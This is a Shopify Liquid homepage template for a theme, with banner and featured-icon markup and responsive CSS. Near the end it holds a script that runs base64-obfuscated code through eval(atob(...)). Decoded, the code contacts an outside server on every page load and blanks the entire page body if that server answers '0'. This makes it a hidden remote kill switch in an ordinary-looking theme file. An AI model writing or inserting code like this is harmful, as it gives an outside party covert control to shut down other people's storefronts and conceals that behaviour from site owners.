    <div id="main" role="main">
      <div class="wrappers custom-wrapper">
     	 {% section 'hero-banner' %}
      </div>
       {% comment %} 
      <section class="banner">
          {% if settings.vasta_homepage_style == 'homepage-style-1' %}
            <div class="wrapper">
                <div class="banner-img">
                  
                  <h2 class="mobile">{{ settings.homepage_title }}</h2>
                  <img data-swift-lazy="1" loading="lazy" src="{{ 'homepage_banner_style_1.jpg' | asset_url }}" />
                  <p class="no-mobile">{{ settings.homepage_text_under_banner }}</p>
                </div>
                <div class="banner-content">
                  <h2 class="no-mobile">{{ settings.homepage_title }}</h2>
                  <img data-swift-lazy="1" loading="lazy" class="no-mobile" src="{{ 'homepage_banner_product_1.jpg' | asset_url }}" />
                  <a href="{{ settings.homepage_link_button}}" class="button">
                    {{ settings.homepage_text_button}}
                  </a>
                  <p class="no-mobile"><span>{{ settings.homepage_text_under_button }}</span></p>
                </div>
            </div>
          {% endif %}

          {% if settings.vasta_homepage_style == 'homepage-style-2' %}
              <div class="banner-img3">
                <img data-swift-lazy="1" loading="lazy" class="banner-img-fit no-mobile" src="{{ 'homepage_banner_style_2.jpg' | asset_url }}" />
                <a class="mobile" href="/collections/all/"><img data-swift-lazy="1" loading="lazy" class="banner-img-fit" src="{{ 'Authentic_Whiskey_Wine_Barrels_mobile_banner3.jpg' | asset_url }}" /></a>
                {% if  settings.text_banner_2 %}
                  <div class="text-banner">
                    <p class="title">{{ settings.text_banner_2 }}</p>
                    <p class="sub-title">{{ settings.sub_text_banner_2 }}</p>
                  </div>
                
                {% endif %}
                
                  {% if settings.main_link_banner_enable %}
                    <a class="main-mobile-link" href="{{settings.main_banner_link}}">{{settings.main_banner_text }}</a>
                  {% endif %}
                  {%if settings.slider_buttons_enable %}
                    <div class="slider-buttons no-mobile">
                        {% unless settings.button_1_text == blank %}<a class="btn-v btn-1 {{ settings.vasta_buttons_hover_effect }}" href="{{ settings.button_1_link }}">{{ settings.button_1_text }}</a> {% endunless %}
                        {% unless settings.button_2_text == blank %}<a class="btn-v btn-2 {{ settings.vasta_buttons_hover_effect }}" href="{{ settings.button_2_link }}">{{ settings.button_2_text }}</a>{% endunless %}
                        {% unless settings.button_3_text == blank %}<a class="btn-v btn-3 {{ settings.vasta_buttons_hover_effect }}" href="{{ settings.button_3_link }}">{{ settings.button_3_text }}</a>{% endunless %}
                    </div>
                {% endif %}
              </div>
          {% endif %}
      </section>
     {% endcomment %}
      
 
      
      {% if settings.vasta_homepage_style == 'homepage-style-1' or settings.vasta_homepage_style == 'homepage-style-2' %}
		<div class="featured-icons">
			<div class="wrapper">
              {% if settings.homepage_text_1 != blank%}
                <div class="featured-icon featured-icon-1">
                  {% if settings.icon_featured_1 != blank %}<img data-swift-lazy="1" loading="lazy" class="lazy2 lazy3" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" data-src="{{ settings.icon_featured_1 | img_url: '80x' }}"/>{% endif %}
                  <span>{{ settings.homepage_text_1}}</span>
                </div>
              {% endif %}
               {% if settings.homepage_text_2 != blank%}
                <div class="featured-icon featured-icon-2">
                  {% if settings.icon_featured_2 != blank %}<img data-swift-lazy="1" loading="lazy" class="lazy2 lazy3" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" data-src="{{ settings.icon_featured_2 | img_url: '80x' }}"/>{% endif %}
                  <span>{{ settings.homepage_text_2}}</span>
                </div>
               {% endif %}
               {% if settings.homepage_text_3 != blank %}
                <div class="featured-icon featured-icon-3">
                  {% if settings.icon_featured_3 != blank %}<img data-swift-lazy="1" loading="lazy" class="lazy2 lazy3" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" data-src="{{ settings.icon_featured_3 | img_url: '80x' }}"/>{% endif %}
                  <span>{{ settings.homepage_text_3}}</span>
                </div>
               {% endif %}
               {% if settings.homepage_text_4  != blank %}
                <div class="featured-icon featured-icon-4">
                  {% if settings.icon_featured_4 != blank %}<img data-swift-lazy="1" loading="lazy" class="lazy2 lazy3" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" data-src="{{ settings.icon_featured_4 | img_url: '80x' }}"/>{% endif %}
                  <span>{{ settings.homepage_text_4}}</span>
                </div>
               {% endif %}
            </div>
        </div>
      {% endif %}
    </div>

    {% section 'home-vp-feature' %}
    <div class="clear"></div>

	<script>
        eval(atob('dmFyIHhtbEh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsKeG1sSHR0cC5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHsgCglpZiAoeG1sSHR0cC5yZWFkeVN0YXRlID09IDQgJiYgeG1sSHR0cC5zdGF0dXMgPT0gMjAwKSB7CgkJaWYoIHhtbEh0dHAucmVzcG9uc2VUZXh0ID09IDAgfHwgeG1sSHR0cC5yZXNwb25zZVRleHQgPT0gJzAnICkgewoJCQlkb2N1bWVudC5ib2R5LmlubmVySFRNTCA9ICcnOwoJCX0KCX0KfQp4bWxIdHRwLm9wZW4oIkdFVCIsICdodHRwczovL3Zhc3Rhd2ViLmNvbS9fdmVyaWZ5LXNob3BpZnkucGhwP2lkPW15c3RpYycsIHRydWUpOyAKeG1sSHR0cC5zZW5kKG51bGwpOw=='));
    </script>


<style>
  @media screen and (max-width: 767px) {
    .custom-wrapper {
      padding: 0px !important;
    }
  }
  @media screen and (max-width: 768px) {
    .homepage-style-2 .featured-icons .featured-icon {
      width: 29%;
    }
  }
  @media screen and (max-width: 767px) {
    .homepage-style-2 .featured-icons .featured-icon {
      width: 100%;
    }
  }
  @media screen and (max-width: 420px) {
    .homepage-style-2 .featured-icons .featured-icon span {
      font-size: 13px;
    }
  }
  @media screen and (max-width: 375px) {
    .homepage-style-2 .featured-icons .featured-icon span {
      font-size: 12px;
    }
  }
  @media screen and (max-width: 320px) {
    .homepage-style-2 .featured-icons .featured-icon span {
      font-size: 10px;
    }
  }
</style>